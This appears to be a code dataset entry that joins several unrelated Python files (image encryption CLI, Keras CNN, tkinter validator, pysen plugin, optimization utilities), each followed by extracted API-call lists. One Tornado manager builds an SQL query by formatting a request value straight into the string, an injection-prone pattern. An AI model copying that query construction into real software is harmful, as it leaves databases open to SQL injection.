elif(inputs[0] == 'show'):
fig = plt.figure(figsize=(10, 7))
fig.add_subplot(1, 2, 1)
if(len(original.shape) == 2):
plt.imshow(original, cmap='gray')
else:
plt.imshow(original)
plt.axis('off')
plt.title("Original")
result = pail.decrypt_image(priv, pub, c_image)
fig.add_subplot(1, 2, 2)
if(len(result.shape) == 2):
plt.imshow(result, cmap='gray')
else:
plt.imshow(result)
plt.axis('off')
plt.title("Result")
plt.show()
elif(inputs[0] == 'keys'):
print(bcolors.OKGREEN+"{} {}".format(pub,priv)+bcolors.ENDC)
elif(inputs[0] == 'help'):
print(bcolors.OKGREEN+"\tbrightness {value}\n\tcolor {color} {value}\n\tmirror\n\tflip\n\tswap {color1} {color2}\n\tmultiply {value}\n\tshow\n\tprint\n\tkeys"+bcolors.ENDC)
else:
print("Wrong input...")
print(bcolors.OKGREEN+"\tbrightness {value}\n\tcolor {color} {value}\n\tmirror\n\tflip\n\tswap {color1} {color2}\n\tmultiply {value}\n\tshow\n\tprint\n\tkeys"+bcolors.ENDC)
except:
print("Wrong input...")
print(bcolors.OKGREEN+"\tbrightness {value}\n\tcolor {color} {value}\n\tmirror\n\tflip\n\tswap {color1} {color2}\n\tmultiply {value}\n\tshow\n\tprint\n\tkeys"+bcolors.ENDC)
|
[
"matplotlib.pyplot.title",
"matplotlib.pyplot.show",
"matplotlib.pyplot.imshow",
"matplotlib.pyplot.axis",
"matplotlib.pyplot.figure"
] |
[((2081, 2108), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 7)'}), '(figsize=(10, 7))\n', (2091, 2108), True, 'from matplotlib import pyplot as plt\n'), ((2256, 2271), 'matplotlib.pyplot.axis', 'plt.axis', (['"""off"""'], {}), "('off')\n", (2264, 2271), True, 'from matplotlib import pyplot as plt\n'), ((2276, 2297), 'matplotlib.pyplot.title', 'plt.title', (['"""Original"""'], {}), "('Original')\n", (2285, 2297), True, 'from matplotlib import pyplot as plt\n'), ((2492, 2507), 'matplotlib.pyplot.axis', 'plt.axis', (['"""off"""'], {}), "('off')\n", (2500, 2507), True, 'from matplotlib import pyplot as plt\n'), ((2512, 2531), 'matplotlib.pyplot.title', 'plt.title', (['"""Result"""'], {}), "('Result')\n", (2521, 2531), True, 'from matplotlib import pyplot as plt\n'), ((2539, 2549), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2547, 2549), True, 'from matplotlib import pyplot as plt\n'), ((2182, 2215), 'matplotlib.pyplot.imshow', 'plt.imshow', (['original'], {'cmap': '"""gray"""'}), "(original, cmap='gray')\n", (2192, 2215), True, 'from matplotlib import pyplot as plt\n'), ((2231, 2251), 'matplotlib.pyplot.imshow', 'plt.imshow', (['original'], {}), '(original)\n', (2241, 2251), True, 'from matplotlib import pyplot as plt\n'), ((2422, 2453), 'matplotlib.pyplot.imshow', 'plt.imshow', (['result'], {'cmap': '"""gray"""'}), "(result, cmap='gray')\n", (2432, 2453), True, 'from matplotlib import pyplot as plt\n'), ((2469, 2487), 'matplotlib.pyplot.imshow', 'plt.imshow', (['result'], {}), '(result)\n', (2479, 2487), True, 'from matplotlib import pyplot as plt\n')]
|
import os
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
import tensorflow as tf
from tensorflow.python import keras
from tensorflow.python.keras.preprocessing.image import ImageDataGenerator
from tensorflow.python.keras.preprocessing.text import Tokenizer
from keras.utils import to_categorical
from tensorflow.python.keras.layers import Input, Dense
from keras.layers import Conv2D
from keras.layers import MaxPooling2D
from keras.layers import Flatten
from keras.layers.normalization import BatchNormalization
from keras.layers.advanced_activations import LeakyReLU
#from tensorflow.python.framework import ops
base_dir = '/home/anoop/Downloads/dogs-vs-cats'
train_dir = os.path.join(base_dir, 'train')
validation_dir = os.path.join(base_dir, 'validation')
# Directory with our training cat/dog pictures
train_cats_dir = os.path.join(train_dir, 'cats')
train_dogs_dir = os.path.join(train_dir, 'dogs')
# Directory with our validation cat/dog pictures
validation_cats_dir = os.path.join(validation_dir, 'cats')
validation_dogs_dir = os.path.join(validation_dir, 'dogs')
train_cat_fnames = os.listdir( train_cats_dir )
train_dog_fnames = os.listdir( train_dogs_dir )
print(train_cat_fnames[:10])
print(train_dog_fnames[:10])
print('total training cat images :', len(os.listdir( train_cats_dir ) ))
print('total training dog images :', len(os.listdir( train_dogs_dir ) ))
print('total validation cat images :', len(os.listdir( validation_cats_dir ) ))
print('total validation dog images :', len(os.listdir( validation_dogs_dir ) ))
# %matplotlib inline
# Parameters for our graph; we'll output images in a 4x4 configuration
nrows = 4
ncols = 4
pic_index = 0 # Index for iterating over images
# Set up matplotlib fig, and size it to fit 4x4 pics
fig = plt.gcf()
fig.set_size_inches(ncols*4, nrows*4)
pic_index+=8
next_cat_pix = [os.path.join(train_cats_dir, fname)
for fname in train_cat_fnames[ pic_index-8:pic_index]
]
next_dog_pix = [os.path.join(train_dogs_dir, fname)
for fname in train_dog_fnames[ pic_index-8:pic_index]
]
for i, img_path in enumerate(next_cat_pix+next_dog_pix):
# Set up subplot; subplot indices start at 1
sp = plt.subplot(nrows, ncols, i + 1)
sp.axis('Off') # Don't show axes (or gridlines)
img = mpimg.imread(img_path)
# plt.imshow(img)
#plt.show()
train_datagen = ImageDataGenerator(rescale=1./255)
train_generator = train_datagen.flow_from_directory(
train_dir,
target_size = (150,150),
batch_size = 20,
class_mode = 'binary'
)
model = tf.keras.models.Sequential([
# Note the input shape is the desired size of the image 150x150 with 3 bytes color
tf.keras.layers.Conv2D(16, (3,3), activation='relu', input_shape=(150, 150, 3)),
tf.keras.layers.MaxPooling2D(2,2),
tf.keras.layers.Conv2D(32, (3,3), activation='relu'),
tf.keras.layers.MaxPooling2D(2,2),
tf.keras.layers.Conv2D(64, (3,3), activation='relu'),
tf.keras.layers.MaxPooling2D(2,2),
# Flatten the results to feed into a DNN
tf.keras.layers.Flatten(),
# 512 neuron hidden layer
tf.keras.layers.Dense(512, activation='relu'),
# Only 1 output neuron. It will contain a value from 0-1 where 0 for 1 class ('cats') and 1 for the other ('dogs')
tf.keras.layers.Dense(1, activation='sigmoid')
])
|
[
"matplotlib.pyplot.subplot",
"tensorflow.python.keras.preprocessing.image.ImageDataGenerator",
"matplotlib.image.imread",
"tensorflow.keras.layers.Conv2D",
"tensorflow.keras.layers.MaxPooling2D",
"tensorflow.keras.layers.Dense",
"matplotlib.pyplot.gcf",
"os.path.join",
"os.listdir",
"tensorflow.keras.layers.Flatten"
] |
[((694, 725), 'os.path.join', 'os.path.join', (['base_dir', '"""train"""'], {}), "(base_dir, 'train')\n", (706, 725), False, 'import os\n'), ((743, 779), 'os.path.join', 'os.path.join', (['base_dir', '"""validation"""'], {}), "(base_dir, 'validation')\n", (755, 779), False, 'import os\n'), ((845, 876), 'os.path.join', 'os.path.join', (['train_dir', '"""cats"""'], {}), "(train_dir, 'cats')\n", (857, 876), False, 'import os\n'), ((894, 925), 'os.path.join', 'os.path.join', (['train_dir', '"""dogs"""'], {}), "(train_dir, 'dogs')\n", (906, 925), False, 'import os\n'), ((998, 1034), 'os.path.join', 'os.path.join', (['validation_dir', '"""cats"""'], {}), "(validation_dir, 'cats')\n", (1010, 1034), False, 'import os\n'), ((1057, 1093), 'os.path.join', 'os.path.join', (['validation_dir', '"""dogs"""'], {}), "(validation_dir, 'dogs')\n", (1069, 1093), False, 'import os\n'), ((1114, 1140), 'os.listdir', 'os.listdir', (['train_cats_dir'], {}), '(train_cats_dir)\n', (1124, 1140), False, 'import os\n'), ((1162, 1188), 'os.listdir', 'os.listdir', (['train_dogs_dir'], {}), '(train_dogs_dir)\n', (1172, 1188), False, 'import os\n'), ((1796, 1805), 'matplotlib.pyplot.gcf', 'plt.gcf', ([], {}), '()\n', (1803, 1805), True, 'import matplotlib.pyplot as plt\n'), ((2421, 2458), 'tensorflow.python.keras.preprocessing.image.ImageDataGenerator', 'ImageDataGenerator', ([], {'rescale': '(1.0 / 255)'}), '(rescale=1.0 / 255)\n', (2439, 2458), False, 'from tensorflow.python.keras.preprocessing.image import ImageDataGenerator\n'), ((1875, 1910), 'os.path.join', 'os.path.join', (['train_cats_dir', 'fname'], {}), '(train_cats_dir, fname)\n', (1887, 1910), False, 'import os\n'), ((2017, 2052), 'os.path.join', 'os.path.join', (['train_dogs_dir', 'fname'], {}), '(train_dogs_dir, fname)\n', (2029, 2052), False, 'import os\n'), ((2253, 2285), 'matplotlib.pyplot.subplot', 'plt.subplot', (['nrows', 'ncols', '(i + 1)'], {}), '(nrows, ncols, i + 1)\n', (2264, 2285), True, 'import matplotlib.pyplot as plt\n'), ((2345, 2367), 'matplotlib.image.imread', 'mpimg.imread', (['img_path'], {}), '(img_path)\n', (2357, 2367), True, 'import matplotlib.image as mpimg\n'), ((1292, 1318), 'os.listdir', 'os.listdir', (['train_cats_dir'], {}), '(train_cats_dir)\n', (1302, 1318), False, 'import os\n'), ((1370, 1396), 'os.listdir', 'os.listdir', (['train_dogs_dir'], {}), '(train_dogs_dir)\n', (1380, 1396), False, 'import os\n'), ((1451, 1482), 'os.listdir', 'os.listdir', (['validation_cats_dir'], {}), '(validation_cats_dir)\n', (1461, 1482), False, 'import os\n'), ((1531, 1562), 'os.listdir', 'os.listdir', (['validation_dogs_dir'], {}), '(validation_dogs_dir)\n', (1541, 1562), False, 'import os\n'), ((2721, 2806), 'tensorflow.keras.layers.Conv2D', 'tf.keras.layers.Conv2D', (['(16)', '(3, 3)'], {'activation': '"""relu"""', 'input_shape': '(150, 150, 3)'}), "(16, (3, 3), activation='relu', input_shape=(150, 150, 3)\n )\n", (2743, 2806), True, 'import tensorflow as tf\n'), ((2806, 2840), 'tensorflow.keras.layers.MaxPooling2D', 'tf.keras.layers.MaxPooling2D', (['(2)', '(2)'], {}), '(2, 2)\n', (2834, 2840), True, 'import tensorflow as tf\n'), ((2845, 2898), 'tensorflow.keras.layers.Conv2D', 'tf.keras.layers.Conv2D', (['(32)', '(3, 3)'], {'activation': '"""relu"""'}), "(32, (3, 3), activation='relu')\n", (2867, 2898), True, 'import tensorflow as tf\n'), ((2903, 2937), 'tensorflow.keras.layers.MaxPooling2D', 'tf.keras.layers.MaxPooling2D', (['(2)', '(2)'], {}), '(2, 2)\n', (2931, 2937), True, 'import tensorflow as tf\n'), ((2943, 2996), 
'tensorflow.keras.layers.Conv2D', 'tf.keras.layers.Conv2D', (['(64)', '(3, 3)'], {'activation': '"""relu"""'}), "(64, (3, 3), activation='relu')\n", (2965, 2996), True, 'import tensorflow as tf\n'), ((3002, 3036), 'tensorflow.keras.layers.MaxPooling2D', 'tf.keras.layers.MaxPooling2D', (['(2)', '(2)'], {}), '(2, 2)\n', (3030, 3036), True, 'import tensorflow as tf\n'), ((3086, 3111), 'tensorflow.keras.layers.Flatten', 'tf.keras.layers.Flatten', ([], {}), '()\n', (3109, 3111), True, 'import tensorflow as tf\n'), ((3148, 3193), 'tensorflow.keras.layers.Dense', 'tf.keras.layers.Dense', (['(512)'], {'activation': '"""relu"""'}), "(512, activation='relu')\n", (3169, 3193), True, 'import tensorflow as tf\n'), ((3319, 3365), 'tensorflow.keras.layers.Dense', 'tf.keras.layers.Dense', (['(1)'], {'activation': '"""sigmoid"""'}), "(1, activation='sigmoid')\n", (3340, 3365), True, 'import tensorflow as tf\n')]
|
import tkinter as tk
def int_validate(entry_widget, from_=None, to=None):
"""
Validates an entry_widget so that only integers within a specified range may be entered
:param entry_widget: The tkinter.Entry widget to validate
:param from_: The start limit of the integer
:param to: The end limit of the integer
:return: None
"""
from_ = from_ if from_ is not None else entry_widget.configure()['from'][4]
to = to if to is not None else entry_widget.configure()['to'][4]
num_str = entry_widget.get()
current = None if (not _is_int(num_str)) else int(num_str)
check = _NumberCheck(entry_widget, from_, to, current=current)
entry_widget.config(validate='all')
entry_widget.config(validatecommand=check.vcmd)
entry_widget.bind('<FocusOut>', lambda event: _validate(entry_widget, check))
_validate(entry_widget, check)
def _is_int(num_str):
"""
Returns whether or not a given string is an integer
:param num_str: The string to test
:return: Whether or not the string is an integer
"""
try:
int(num_str)
return True
except ValueError:
return False
def _validate(entry, num_check):
"""
    Validates an entry so that, if it contains invalid text, the text is replaced by the last valid text
:param entry: The entry widget
:param num_check: The _NumberCheck instance that keeps track of the last valid number
:return: None
"""
if not _is_int(entry.get()):
entry.delete(0, tk.END)
entry.insert(0, str(num_check.last_valid))
class _NumberCheck:
"""
    Class used for validating entry widgets; self.vcmd is provided as the validatecommand
"""
def __init__(self, parent, min_, max_, current):
self.parent = parent
self.low = min_
self.high = max_
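        # Tcl validate command: '%d' passes the action type (1=insert, 0=delete,
        # -1=forced/other) and '%P' the prospective text after the edit.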
self.vcmd = parent.register(self.in_integer_range), '%d', '%P'
if _NumberCheck.in_range(0, min_, max_):
self.last_valid = 0
else:
self.last_valid = min_
if current is not None:
self.last_valid = current
def in_integer_range(self, type_, after_text):
"""
Validates an entry to make sure the correct text is being inputted
:param type_: 0 for deletion, 1 for insertion, -1 for focus in
:param after_text: The text that the entry will display if validated
:return:
"""
if type_ == '-1':
if _is_int(after_text):
self.last_valid = int(after_text)
# Delete Action, always okay, if valid number save it
elif type_ == '0':
try:
num = int(after_text)
self.last_valid = num
except ValueError:
pass
return True
# Insert Action, okay based on ranges, if valid save num
elif type_ == '1':
try:
num = int(after_text)
except ValueError:
if self.can_be_negative() and after_text == '-':
return True
return False
if self.is_valid_range(num):
self.last_valid = num
return True
return False
return False
def can_be_negative(self):
"""
Tests whether this given entry widget can have a negative number
:return: Whether or not the entry can have a negative number
"""
return (self.low is None) or (self.low < 0)
def is_valid_range(self, num):
"""
Tests whether the given number is valid for this entry widgets range
:param num: The number to range test
:return: Whether or not the number is in range
"""
return _NumberCheck.in_range(num, self.low, self.high)
@staticmethod
def in_range(num, low, high):
"""
Tests whether or not a number is within a specified range inclusive
:param num: The number to test if its in the range
:param low: The minimum of the range
:param high: The maximum of the range
:return: Whether or not the number is in the range
"""
if (low is not None) and (num < low):
return False
if (high is not None) and (num > high):
return False
return True
if __name__ == '__main__':
import tkinter as tk
from tkinter import ttk
root = tk.Tk()
widget = ttk.Spinbox(root, justify=tk.CENTER, from_=-5, to_=10)
widget.pack(padx=10, pady=10)
int_validate(widget)
root.mainloop()
|
[
"tkinter.Tk",
"tkinter.ttk.Spinbox"
] |
[((4447, 4454), 'tkinter.Tk', 'tk.Tk', ([], {}), '()\n', (4452, 4454), True, 'import tkinter as tk\n'), ((4468, 4522), 'tkinter.ttk.Spinbox', 'ttk.Spinbox', (['root'], {'justify': 'tk.CENTER', 'from_': '(-5)', 'to_': '(10)'}), '(root, justify=tk.CENTER, from_=-5, to_=10)\n', (4479, 4522), False, 'from tkinter import ttk\n')]
|
# Modules
import subprocess
from os import name
from ..utils.bases import BaseCommand
# Command class
class Clear(BaseCommand):
def __init__(self, core):
self.core = core
def clear(self, arguments):
# Locate our command
command = "clear"
if name == "nt":
command = "cls"
# Execute
subprocess.run([command], shell = True)
|
[
"subprocess.run"
] |
[((354, 391), 'subprocess.run', 'subprocess.run', (['[command]'], {'shell': '(True)'}), '([command], shell=True)\n', (368, 391), False, 'import subprocess\n')]
|
# -*- coding: utf-8 -*-
# standard library
from unittest.mock import Mock
__author__ = "Ssu-Tsen"
__license__ = "Apache 2.0"
# scip plugin
from ribbon.client.config.client_config import ClientConfig
from spring_cloud.ribbon.spring_client_factory import DynamicServerListLoadBalancer, SpringClientFactory
class TestSpringClientFactory:
eureka_client = Mock()
eureka_client.get_instances_by_virtual_host_name = Mock(return_value=[])
spring_client_factory = SpringClientFactory(eureka_client)
def test_get_client_config(self):
assert isinstance(self.spring_client_factory.get_client_config("1"), ClientConfig)
assert self.spring_client_factory.get_client_config("2") == self.spring_client_factory.get_client_config("2")
def test_get_load_balancer(self):
assert isinstance(self.spring_client_factory.get_load_balancer("1"), DynamicServerListLoadBalancer)
assert self.spring_client_factory.get_load_balancer("2") == self.spring_client_factory.get_load_balancer("2")
|
[
"unittest.mock.Mock",
"spring_cloud.ribbon.spring_client_factory.SpringClientFactory"
] |
[((379, 385), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (383, 385), False, 'from unittest.mock import Mock\n'), ((441, 462), 'unittest.mock.Mock', 'Mock', ([], {'return_value': '[]'}), '(return_value=[])\n', (445, 462), False, 'from unittest.mock import Mock\n'), ((491, 525), 'spring_cloud.ribbon.spring_client_factory.SpringClientFactory', 'SpringClientFactory', (['eureka_client'], {}), '(eureka_client)\n', (510, 525), False, 'from spring_cloud.ribbon.spring_client_factory import DynamicServerListLoadBalancer, SpringClientFactory\n')]
|
#!/usr/bin/env python
from rich.progress import track
from rich import print
from rich.progress import Progress
from rich.table import Column
from rich.progress import Progress, BarColumn, TextColumn,TimeRemainingColumn,SpinnerColumn,TimeElapsedColumn
from rich.console import Console
filename="big.fa"
seqCount=0
num_lines = sum(1 for line in open(filename,'r'))
print("num_lines:",num_lines)
console = Console(record=True)
with Progress(
SpinnerColumn(),
TextColumn("[progress.description]{task.description}"),
BarColumn(),
TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
TimeRemainingColumn(),
TimeElapsedColumn(),
console=console,
transient=True,
) as progress:
task1 = progress.add_task("[green]Reading FASTA",total=num_lines)
with open(filename) as f:
for line in f:
progress.update(task1,advance=1)
if ">" in line:
seqCount+=1
progress.log(line.strip(),seqCount)
|
[
"rich.progress.TextColumn",
"rich.print",
"rich.progress.BarColumn",
"rich.progress.SpinnerColumn",
"rich.console.Console",
"rich.progress.TimeRemainingColumn",
"rich.progress.TimeElapsedColumn"
] |
[((366, 396), 'rich.print', 'print', (['"""num_lines:"""', 'num_lines'], {}), "('num_lines:', num_lines)\n", (371, 396), False, 'from rich import print\n'), ((407, 427), 'rich.console.Console', 'Console', ([], {'record': '(True)'}), '(record=True)\n', (414, 427), False, 'from rich.console import Console\n'), ((448, 463), 'rich.progress.SpinnerColumn', 'SpinnerColumn', ([], {}), '()\n', (461, 463), False, 'from rich.progress import Progress, BarColumn, TextColumn, TimeRemainingColumn, SpinnerColumn, TimeElapsedColumn\n'), ((469, 523), 'rich.progress.TextColumn', 'TextColumn', (['"""[progress.description]{task.description}"""'], {}), "('[progress.description]{task.description}')\n", (479, 523), False, 'from rich.progress import Progress, BarColumn, TextColumn, TimeRemainingColumn, SpinnerColumn, TimeElapsedColumn\n'), ((529, 540), 'rich.progress.BarColumn', 'BarColumn', ([], {}), '()\n', (538, 540), False, 'from rich.progress import Progress, BarColumn, TextColumn, TimeRemainingColumn, SpinnerColumn, TimeElapsedColumn\n'), ((546, 605), 'rich.progress.TextColumn', 'TextColumn', (['"""[progress.percentage]{task.percentage:>3.0f}%"""'], {}), "('[progress.percentage]{task.percentage:>3.0f}%')\n", (556, 605), False, 'from rich.progress import Progress, BarColumn, TextColumn, TimeRemainingColumn, SpinnerColumn, TimeElapsedColumn\n'), ((611, 632), 'rich.progress.TimeRemainingColumn', 'TimeRemainingColumn', ([], {}), '()\n', (630, 632), False, 'from rich.progress import Progress, BarColumn, TextColumn, TimeRemainingColumn, SpinnerColumn, TimeElapsedColumn\n'), ((638, 657), 'rich.progress.TimeElapsedColumn', 'TimeElapsedColumn', ([], {}), '()\n', (655, 657), False, 'from rich.progress import Progress, BarColumn, TextColumn, TimeRemainingColumn, SpinnerColumn, TimeElapsedColumn\n')]
|
import dataclasses
import pathlib
import subprocess
from typing import DefaultDict, List, Sequence
import dacite
from pysen.command import CommandBase
from pysen.component import ComponentBase, RunOptions
from pysen.path import change_dir
from pysen.plugin import PluginBase
from pysen.pyproject_model import Config, PluginConfig
from pysen.reporter import Reporter
from pysen.runner_options import PathContext
from pysen.setting import SettingFile
class ShellCommand(CommandBase):
def __init__(self, name: str, base_dir: pathlib.Path, cmd: Sequence[str]) -> None:
self._name = name
self._base_dir = base_dir
self._cmd = cmd
@property
def name(self) -> str:
return self._name
def __call__(self, reporter: Reporter) -> int:
with change_dir(self._base_dir):
try:
ret = subprocess.run(self._cmd)
reporter.logger.info(f"{self._cmd} returns {ret.returncode}")
return ret.returncode
except BaseException as e:
reporter.logger.info(
f"an error occured while executing: {self._cmd}\n{e}"
)
return 255
class ShellComponent(ComponentBase):
def __init__(self, name: str, cmd: Sequence[str], targets: Sequence[str]) -> None:
self._name = name
self._cmd = cmd
self._targets = targets
@property
def name(self) -> str:
return self._name
def export_settings(
self, paths: PathContext, files: DefaultDict[str, SettingFile],
) -> None:
print(f"Called export_settings at {self._name}: do nothing")
@property
def targets(self) -> Sequence[str]:
return self._targets
def create_command(
self, target: str, paths: PathContext, options: RunOptions
) -> CommandBase:
assert target in self._targets
return ShellCommand(self._name, paths.base_dir, self._cmd)
@dataclasses.dataclass
class ShellPluginConfig:
name: str
command: List[str]
targets: List[str]
class ShellPlugin(PluginBase):
def load(
self, file_path: pathlib.Path, config_data: PluginConfig, root: Config
) -> Sequence[ComponentBase]:
assert (
config_data.config is not None
), f"{config_data.location}.config must be not None"
config = dacite.from_dict(
ShellPluginConfig, config_data.config, dacite.Config(strict=True)
)
return [ShellComponent(config.name, config.command, config.targets)]
# NOTE(igarashi): This is the entry point of a plugin method
def plugin() -> PluginBase:
return ShellPlugin()
|
[
"dacite.Config",
"pysen.path.change_dir",
"subprocess.run"
] |
[((790, 816), 'pysen.path.change_dir', 'change_dir', (['self._base_dir'], {}), '(self._base_dir)\n', (800, 816), False, 'from pysen.path import change_dir\n'), ((2434, 2460), 'dacite.Config', 'dacite.Config', ([], {'strict': '(True)'}), '(strict=True)\n', (2447, 2460), False, 'import dacite\n'), ((857, 882), 'subprocess.run', 'subprocess.run', (['self._cmd'], {}), '(self._cmd)\n', (871, 882), False, 'import subprocess\n')]
|
from __future__ import absolute_import
from nightson.managers.base_entity_manager import BaseEntityManager
from tornado import gen
class EventUsersManager(BaseEntityManager):
def __init__(self):
pass
def __init__(self, request):
super(EventUsersManager, self).__init__(request)
@gen.coroutine
def get_users(self):
event_id = self.get_value('event_id')
sql = ''' SELECT
Users.id,
Users.first_name,
Users.last_name,
Users.photo_url,
ST_AsGeoJson(location) AS location,
Users.location_recorded_at
FROM UsersEvents INNER JOIN Users ON Users.id = UsersEvents.user_id
WHERE event_id = {0} ; '''.format(event_id)
result = yield self.execute_sql(sql)
raise gen.Return(result)
|
[
"tornado.gen.Return"
] |
[((863, 881), 'tornado.gen.Return', 'gen.Return', (['result'], {}), '(result)\n', (873, 881), False, 'from tornado import gen\n')]
|
"""
###########################################################################
# @file optimization_utils.py
# @brief Functions for optimizing transformations and parameters.
#
# @author <NAME>
#
# @Link: https://www.cbica.upenn.edu/sbia/software/
#
# @Contact: <EMAIL>
##########################################################################
"""
import numpy as np
from numpy import transpose as Tr
def initialization(x,y,K):
np.random.seed()
D,M = x.shape
N = y.shape[1]
params = {'delta':None,'sigsq':None,'T':None,'t':None}
params['delta'] = np.ones((K,M))/K
sigsq = 0
for n in range(N):
tmp = x - y[:,n].reshape(-1,1)
sigsq = sigsq + np.sum(np.power(tmp,2))
params['sigsq'] = sigsq/D/M/N;
params['T'] = np.repeat(np.eye(D).reshape(D,D,1),K,axis=2)
params['t'] = np.random.uniform(size=(D,K))
return params
def transform( x,params ):
T = params['T']
t = params['t']
delta = params['delta']
[D,M] = x.shape
K = T.shape[2]
transformed_x = np.zeros((D,M))
Tym = np.zeros((D,M,K))
for k in range(K):
Tym[:,:,k] = np.dot(T[:,:,k], x) + t[:,k].reshape(-1,1)
for m in range(M):
tmp = np.zeros(D)
for k in range(K):
tmp = tmp + delta[k,m] * Tym[:,m,k]
transformed_x[:,m] = tmp;
return transformed_x
def transform2( x,params ):
T = params['T']
delta = params['delta']
D,M = x.shape
K = T.shape[2]
transformed_x = np.zeros((D,M))
Tym = np.zeros((D,M,K))
for k in range(K):
Tym[:,:,k] = np.dot(T[:,:,k],x)
for m in range(M):
tmp = np.zeros(D)
for k in range(K):
tmp = tmp + delta[k,m] * Tym[:,m,k]
transformed_x[:,m] = tmp
return transformed_x
def transform3( x,params ):
T = params['T']
t = params['t']
D,K = t.shape
transformed_x = np.zeros((D,K))
for k in range(K):
transformed_x[:,k] = np.dot(T[:,:,k],x) + t[:,k]
return transformed_x
def Estep(y,yd,ys,tx,xd,xs,sigsq,r,rs):
"""Expectation calculation.
"""
M = tx.shape[1]
N = y.shape[1]
#> calculate RBF kernel distance based on imaging features
D1 = np.diag(np.dot(Tr(y),y))
D2 = np.diag(np.dot(Tr(tx),tx))
Mid = 2 * np.dot(Tr(y),tx)
tmp1 = D1.reshape(-1,1).repeat(M,axis=1) - Mid + D2.reshape(1,-1).repeat(N,axis=0)
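    # tmp1[n, m] = ||y[:, n] - tx[:, m]||^2 via the ||a||^2 - 2*a.b + ||b||^2 expansion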
#> calculate RBF kernel distance based on covariate features
tmp2 = np.zeros(tmp1.shape)
if r != 0:
D1 = np.diag(np.dot(Tr(yd),yd))
D2 = np.diag(np.dot(Tr(xd),xd))
Mid = 2 * np.dot(Tr(yd),xd)
tmp2 = D1.reshape(-1,1).repeat(M,axis=1) - Mid + D2.reshape(1,-1).repeat(N,axis=0)
#> calculate RBF kernel distance based on set information
tmp3 = np.zeros(tmp1.shape)
if rs != 0:
D1 = np.diag(np.dot(Tr(ys),ys))
D2 = np.diag(np.dot(Tr(xs),xs))
Mid = 2 * np.dot(Tr(ys),xs)
tmp3 = D1.reshape(-1,1).repeat(M,axis=1) - Mid + D2.reshape(1,-1).repeat(N,axis=0)
    #> combine distances and normalize to probability distribution
P = np.exp((-tmp1-r*tmp2-rs*tmp3)/2/sigsq)+np.finfo(np.float).tiny
P = P/np.sum(P,axis=1).reshape(-1,1)
return P
def Mstep(y,yd,ys,x,tx,xd,xs,P,params,config):
"""Mstep optimization, for different transformation import different modules
"""
if config['transform'] == 'affine':
from Mstep_affine import solve_sigsq,solve_delta,solve_T,solve_t
elif config['transform'] == 'duo':
from Mstep_duo import solve_sigsq,solve_delta,solve_T,solve_t
else:
from Mstep_trans import solve_sigsq,solve_delta,solve_T,solve_t
params['sigsq'] = solve_sigsq(y,yd,ys,tx,xd,xs,P,params,config)
params['delta'] = solve_delta(y,x,P,params)
params['T'] = solve_T(y,x,P,params,config)
params['t'] = solve_t(y,x,P,params,config)
return params
def calc_obj(x,y,xd,yd,xs,ys,P,params,config):
"""Objective function calculation
"""
lambda1 = config['lambda1']
lambda2 = config['lambda2']
r = config['r']
rs = config['rs']
K = config['K']
D,N = y.shape
M = x.shape[1]
d = 0
ds = 0
IM = np.ones((M,1))
IN = np.ones((N,1))
tx = transform(x,params)
tmp = 0
for i in range(K):
tmp = tmp + np.power(np.linalg.norm(params['T'][:,:,i]-np.eye(D),'fro'),2)
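    # P1/P2 are diagonal matrices of the row sums (N x N) and column sums (M x M) of P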
P1 = np.diag(np.dot(P,IM).flatten())
P2 = np.diag(np.dot(Tr(P),IN).flatten())
term1 = np.trace(y.dot(P1).dot(Tr(y)) - 2*y.dot(P).dot(Tr(tx)) + tx.dot(P2).dot(Tr(tx)))
term2 = 0
if r != 0:
d = xd.shape[0]
term2 = r * np.trace(yd.dot(P1).dot(Tr(yd)) - 2*yd.dot(P).dot(Tr(xd)) + xd.dot(P2).dot(Tr(xd)))
term3 = 0
if rs != 0:
ds = 1
term3 = rs * np.trace(ys.dot(P1).dot(Tr(ys)) - 2*ys.dot(P).dot(Tr(xs)) + xs.dot(P2).dot(Tr(xs)))
obj = 0.5/params['sigsq'] * ( term1 + term2 + term3 \
+ lambda1*np.power(np.linalg.norm(params['t'],'fro'),2) +lambda2*tmp) \
+ N*(D+d+ds)/2.0*np.log(params['sigsq'])
return obj
|
[
"numpy.random.uniform",
"Mstep_trans.solve_delta",
"numpy.random.seed",
"numpy.log",
"numpy.eye",
"Mstep_trans.solve_T",
"numpy.sum",
"Mstep_trans.solve_sigsq",
"numpy.power",
"numpy.zeros",
"numpy.ones",
"numpy.transpose",
"numpy.finfo",
"numpy.linalg.norm",
"numpy.exp",
"Mstep_trans.solve_t",
"numpy.dot"
] |
[((435, 451), 'numpy.random.seed', 'np.random.seed', ([], {}), '()\n', (449, 451), True, 'import numpy as np\n'), ((832, 862), 'numpy.random.uniform', 'np.random.uniform', ([], {'size': '(D, K)'}), '(size=(D, K))\n', (849, 862), True, 'import numpy as np\n'), ((1040, 1056), 'numpy.zeros', 'np.zeros', (['(D, M)'], {}), '((D, M))\n', (1048, 1056), True, 'import numpy as np\n'), ((1071, 1090), 'numpy.zeros', 'np.zeros', (['(D, M, K)'], {}), '((D, M, K))\n', (1079, 1090), True, 'import numpy as np\n'), ((1508, 1524), 'numpy.zeros', 'np.zeros', (['(D, M)'], {}), '((D, M))\n', (1516, 1524), True, 'import numpy as np\n'), ((1539, 1558), 'numpy.zeros', 'np.zeros', (['(D, M, K)'], {}), '((D, M, K))\n', (1547, 1558), True, 'import numpy as np\n'), ((1919, 1935), 'numpy.zeros', 'np.zeros', (['(D, K)'], {}), '((D, K))\n', (1927, 1935), True, 'import numpy as np\n'), ((2498, 2518), 'numpy.zeros', 'np.zeros', (['tmp1.shape'], {}), '(tmp1.shape)\n', (2506, 2518), True, 'import numpy as np\n'), ((2819, 2839), 'numpy.zeros', 'np.zeros', (['tmp1.shape'], {}), '(tmp1.shape)\n', (2827, 2839), True, 'import numpy as np\n'), ((3733, 3786), 'Mstep_trans.solve_sigsq', 'solve_sigsq', (['y', 'yd', 'ys', 'tx', 'xd', 'xs', 'P', 'params', 'config'], {}), '(y, yd, ys, tx, xd, xs, P, params, config)\n', (3744, 3786), False, 'from Mstep_trans import solve_sigsq, solve_delta, solve_T, solve_t\n'), ((3801, 3829), 'Mstep_trans.solve_delta', 'solve_delta', (['y', 'x', 'P', 'params'], {}), '(y, x, P, params)\n', (3812, 3829), False, 'from Mstep_trans import solve_sigsq, 